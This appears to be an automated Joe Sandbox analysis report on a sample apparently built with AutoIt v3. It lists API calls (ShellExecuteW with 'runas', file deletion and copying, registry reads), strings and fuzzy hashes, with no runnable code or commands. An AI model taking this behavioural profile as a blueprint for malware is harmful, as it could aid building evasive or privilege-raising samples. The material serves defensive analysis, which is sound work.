Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 9cde6286fc2a1427325c8b6169415f8474511e4cd879a1a0fac40f770fd1138d
Instruction ID: 8e71b7261c3b078214ddb03d42956c154f1c985ae19708bb980fddccdd9067e2
Opcode Fuzzy Hash: 9cde6286fc2a1427325c8b6169415f8474511e4cd879a1a0fac40f770fd1138d
Instruction Fuzzy Hash: 1E117C70600704FFDB218B65DD98F277BB9EBC5B91F2041AAF402D6290EB71DC20C666

Function 004A2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00462B6B

Part of subcall function 00463A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00531418,?,00462E7F,?,?,?,00000000), ref: 00463A78

Part of subcall function 00469CB3: _wcslen.LIBCMT ref: 00469CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00522224), ref: 004A2C10
ShellExecuteW.SHELL32(00000000,?,?,00522224), ref: 004A2C17

Strings

runas, xrefs: 004A2C0B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 35691d14ee6a7382536b01331034daeb6bffbd499e9e409b3a3a6f74bd8b2026
Instruction ID: e1950069606c956845fe097aa741a3c9bd552db0ae6a31025d689ca3a659a1a0
Opcode Fuzzy Hash: 35691d14ee6a7382536b01331034daeb6bffbd499e9e409b3a3a6f74bd8b2026
Instruction Fuzzy Hash: 4C11D231208785AAC704FF71D9519BEBBA4AFA1749F04042FF482121A2EF789A49D71B

Function 004CDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,004A5222), ref: 004CDBCE
GetFileAttributesW.KERNELBASE(?), ref: 004CDBDD
FindFirstFileW.KERNELBASE(?,?), ref: 004CDBEE
FindClose.KERNEL32(00000000), ref: 004CDBFA

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 97a7fd4874213a05ba1bc8d1f45ea30726ae5bd4d41d2c9f73739c599976f35a
Instruction ID: aac5fc7b0f70bbfdfb0534570a35e0e9792dbc01b911ce8949aa6f19f9d7b9c5
Opcode Fuzzy Hash: 97a7fd4874213a05ba1bc8d1f45ea30726ae5bd4d41d2c9f73739c599976f35a
Instruction Fuzzy Hash: 1FF0A030C109185782206B78AE4D9BB376C9E01334B14476BF836C21E0EBB46965C69E

Function 0046BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#S, xrefs: 004B07CE

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#S
API String ID: 3964851224-3883648621
Opcode ID: dcef004722599683c9be1a9a8554cfdf95785f6b047316a06a67885d0a824114
Instruction ID: 2ce6bc9b60fac18aa02c86d91a24c78e3423352adabc6078533c8b9a05f6842b
Opcode Fuzzy Hash: dcef004722599683c9be1a9a8554cfdf95785f6b047316a06a67885d0a824114
Instruction Fuzzy Hash: F3A24B706083419FC724DF15C480B6BB7E1BF89304F14896EE89A9B352E779E845CB9B

Function 0046D730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 0046D807
timeGetTime.WINMM ref: 0046DA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0046DB28
TranslateMessage.USER32(?), ref: 0046DB7B
DispatchMessageW.USER32(?), ref: 0046DB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0046DB9F
Sleep.KERNEL32(0000000A), ref: 0046DBB1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 01f61b0ff6175380d9644a4477d199c86f078dbd39ef77b425744e7132875197
Instruction ID: 592771b574e21708d7831143fbdcc37a6286be0e1a9d8e9d0064c2fdf519557c
Opcode Fuzzy Hash: 01f61b0ff6175380d9644a4477d199c86f078dbd39ef77b425744e7132875197
Instruction Fuzzy Hash: 6542E170B08641DFD728CF25C994BAAB7A0BF45304F14851FE455873A1E7B8E848CB9B

Function 00462CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00462D07
RegisterClassExW.USER32(00000030), ref: 00462D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00462D42
InitCommonControlsEx.COMCTL32(?), ref: 00462D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00462D6F
LoadIconW.USER32(000000A9), ref: 00462D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00462D94

Strings

TaskbarCreated, xrefs: 00462D37
+, xrefs: 00462CF0
AutoIt v3 GUI, xrefs: 00462D23
0, xrefs: 00462CE9

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 96b0791f222aabe43709ab8af8743f4c357842518c048e3de98b2a6497175b8e
Instruction ID: 002c1f08aa75a73dd998ea04eeb86d4c75555a9b6b42e62b2fdeafd4c9ec373b
Opcode Fuzzy Hash: 96b0791f222aabe43709ab8af8743f4c357842518c048e3de98b2a6497175b8e
Instruction Fuzzy Hash: 7121E3B190120DEFDB00DFA4E989BEDBBB4FB08700F00812AF611A63A0D7B51558DF99

Function 004A065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004A039A: CreateFileW.KERNELBASE(00000000,00000000,?,004A0704,?,?,00000000,?,004A0704,00000000,0000000C), ref: 004A03B7

GetLastError.KERNEL32 ref: 004A076F
__dosmaperr.LIBCMT ref: 004A0776
GetFileType.KERNELBASE(00000000), ref: 004A0782
GetLastError.KERNEL32 ref: 004A078C
__dosmaperr.LIBCMT ref: 004A0795
CloseHandle.KERNEL32(00000000), ref: 004A07B5
CloseHandle.KERNEL32(?), ref: 004A08FF
GetLastError.KERNEL32 ref: 004A0931
__dosmaperr.LIBCMT ref: 004A0938

Strings

H, xrefs: 004A08BD

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 205b4f3d179482f0955df3fa1c8a99b28dd0dec18580837898b4871277f3e7ea
Instruction ID: 010ea26daee4272581390c3c2d5cd735efc9dc5ef289dc6e68e004fc5a416ced
Opcode Fuzzy Hash: 205b4f3d179482f0955df3fa1c8a99b28dd0dec18580837898b4871277f3e7ea
Instruction Fuzzy Hash: B1A12536A001088FDF19EF68D891BAE7BA0AB16324F14015EF815DB3D1D7399C16CB99

Function 0046344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00463A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00531418,?,00462E7F,?,?,?,00000000), ref: 00463A78

Part of subcall function 00463357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00463379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0046356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004A318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004A31CE
RegCloseKey.ADVAPI32(?), ref: 004A3210
_wcslen.LIBCMT ref: 004A3277
_wcslen.LIBCMT ref: 004A3286

Strings

Include, xrefs: 004A3184, 004A31C5
\, xrefs: 004A328C
Software\AutoIt v3\AutoIt, xrefs: 00463560
\Include\, xrefs: 00463527

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: f11c20951e80d1052188d1f34635e0cd848cdc1c0a34671f60f22c4d65a86ff9
Instruction ID: e65681318dbc3bc06f94b020f427097dc294d5baa44d8e2d1bec1a554d1a71ec
Opcode Fuzzy Hash: f11c20951e80d1052188d1f34635e0cd848cdc1c0a34671f60f22c4d65a86ff9
Instruction Fuzzy Hash: 5371C2714047049EC314EF66EC819ABBBE8FFA5344F50482FF54583260EB389A4CDB5A

Function 00462B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00462B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00462B9D
LoadIconW.USER32(00000063), ref: 00462BB3
LoadIconW.USER32(000000A4), ref: 00462BC5
LoadIconW.USER32(000000A2), ref: 00462BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00462BEF
RegisterClassExW.USER32(?), ref: 00462C40

Part of subcall function 00462CD4: GetSysColorBrush.USER32(0000000F), ref: 00462D07
Part of subcall function 00462CD4: RegisterClassExW.USER32(00000030), ref: 00462D31
Part of subcall function 00462CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00462D42
Part of subcall function 00462CD4: InitCommonControlsEx.COMCTL32(?), ref: 00462D5F
Part of subcall function 00462CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00462D6F
Part of subcall function 00462CD4: LoadIconW.USER32(000000A9), ref: 00462D85
Part of subcall function 00462CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00462D94

Strings

0, xrefs: 00462C0F
#, xrefs: 00462C16
AutoIt v3, xrefs: 00462C2F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 20a35adc69447bff29600b3098dade403acf596aa1001883cf4e387b701c3ee9
Instruction ID: b38c7e429eb06bfce930fc60cafa24529150ee2fde8b4839f17e05ace36bdf8d
Opcode Fuzzy Hash: 20a35adc69447bff29600b3098dade403acf596aa1001883cf4e387b701c3ee9
Instruction Fuzzy Hash: 91214C71E00718ABDB109FA6ED85AA97FB4FB18B50F00442AE500A77A0D3B50558EF9C

Function 00463170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0046316A,?,?), ref: 004631D8
KillTimer.USER32(?,00000001,?,?,?,?,?,0046316A,?,?), ref: 00463204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00463227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0046316A,?,?), ref: 00463232
CreatePopupMenu.USER32 ref: 00463246
PostQuitMessage.USER32(00000000), ref: 00463267

Strings

TaskbarCreated, xrefs: 0046322D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: ea19f2d53f4c6bb6ca8f1e30abc37501caeb53c43a2ac3216e81f459a2b2c46a
Instruction ID: 32a6b7073bbafa028af6ec78e20cc9c0cf982be804352ed6e9c495cb5eaec745
Opcode Fuzzy Hash: ea19f2d53f4c6bb6ca8f1e30abc37501caeb53c43a2ac3216e81f459a2b2c46a
Instruction Fuzzy Hash: C1418E31200684A7DB102F789D5DBBA3A59E716306F04012BF502C63A1EB7C9F55E76F

Function 0046DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%S, xrefs: 0046E1E0
D%S, xrefs: 004B2FDA
D%SD%S, xrefs: 0046E27E
Variable must be of type 'Object'., xrefs: 004B32B7
D%S, xrefs: 004B302D
D%S, xrefs: 0046E4B1

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: D%S$D%S$D%S$D%S$D%SD%S$Variable must be of type 'Object'.
API String ID: 0-2621733739
Opcode ID: b7e842aa93f927a8f4e79f5116bef4023d0af88a9f908543830be481817280e7
Instruction ID: 0c5dc6c6d1aa140ae9c8974e878b20400e5f3fb198ca04b2775485ce9c0843d6
Opcode Fuzzy Hash: b7e842aa93f927a8f4e79f5116bef4023d0af88a9f908543830be481817280e7
Instruction Fuzzy Hash: E5C2A179A00214CFCB24CF5AC880AAEB7F1BF15304F24855BE906AB351E779ED45CB5A

Function 010266F8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 010267C9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 010269EF

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 08771fdc04096e7ece8f14c0dda199062a358a7e0feaee374f3577947410d832
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: A3A12A74E00219EBDB14CFA4C894BEEBBB5FF48304F208599E945BB280DB769A41CF54

Function 00462C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00462C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00462CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,00461CAD,?), ref: 00462CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,00461CAD,?), ref: 00462CCF

Strings

edit, xrefs: 00462CAC
AutoIt v3, xrefs: 00462C89, 00462C8E, 00462C8F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: a0fa58c525c702537552ab30e27d27dc9cefad82957e182d68c92126de52c5f5
Instruction ID: 35636028b20d7a6054f00527082976c474c7a15211ff62847df52c60b71537a2
Opcode Fuzzy Hash: a0fa58c525c702537552ab30e27d27dc9cefad82957e182d68c92126de52c5f5
Instruction Fuzzy Hash: 61F05E755402987AEB311723AC48EB73EBDD7D6F50F00042EFA00A32A0C6750858EEB8

Function 010264C8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 010263B8: Sleep.KERNELBASE(000001F4), ref: 010263C9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010265F1

Strings

9GXIG02S84MMCVKZLPS14JQ205J, xrefs: 01026654, 01026657

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateFileSleep
String ID: 9GXIG02S84MMCVKZLPS14JQ205J
API String ID: 2694422964-2632127770
Opcode ID: 9547d9a57895a6ce343750c698b8b7d7bb866d7e982fc3ce899f14d70636fa9d
Instruction ID: c0e65f902ce710a1e692166a6148d6f459d7a0a7bd564a1b0c1fa8191077e050
Opcode Fuzzy Hash: 9547d9a57895a6ce343750c698b8b7d7bb866d7e982fc3ce899f14d70636fa9d
Instruction Fuzzy Hash: 6C51A430D04299DAEF11D7E8C859BEEBFB89F19304F048199E6487B2C1C7BA0B45CB65

Function 004D2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004D2C05
DeleteFileW.KERNEL32(?), ref: 004D2C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004D2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004D2CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004D2CC0

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: cdb213b960aae9f5334058b2c5069a61f0346baca2a9c6200b09c0f6b7987bf8
Instruction ID: 58a5b44eb7b63d3bcfb69118bb2c69ff9afbeb960a1cfd9c628a2d8a1b50ab5d
Opcode Fuzzy Hash: cdb213b960aae9f5334058b2c5069a61f0346baca2a9c6200b09c0f6b7987bf8
Instruction Fuzzy Hash: FCB17D71D00119ABDF21EFA5CD95EDEB7BCEF18304F0040ABF509A6241EA789E448F65

Function 00495AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JOF, xrefs: 00495BA8, 00495C6C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID: JOF
API String ID: 0-1779590763
Opcode ID: b4b9a5c5e8a6599f974d754294e38bc9d0811bd774e0f9eaf33ef1968b779af8
Instruction ID: 305cf6d786335fe8e1995b1c66b8f051019e2ea74b3e63ebc9f234f0d2d98ab9
Opcode Fuzzy Hash: b4b9a5c5e8a6599f974d754294e38bc9d0811bd774e0f9eaf33ef1968b779af8
Instruction Fuzzy Hash: A251D171D00609AFCF22AFA5C945FAFBFB4AF05314F24006BF405A7291D7799901DB6A

Function 00463B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00463B0F,SwapMouseButtons,00000004,?), ref: 00463B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00463B0F,SwapMouseButtons,00000004,?), ref: 00463B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00463B0F,SwapMouseButtons,00000004,?), ref: 00463B83

Strings

Control Panel\Mouse, xrefs: 00463B3E

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
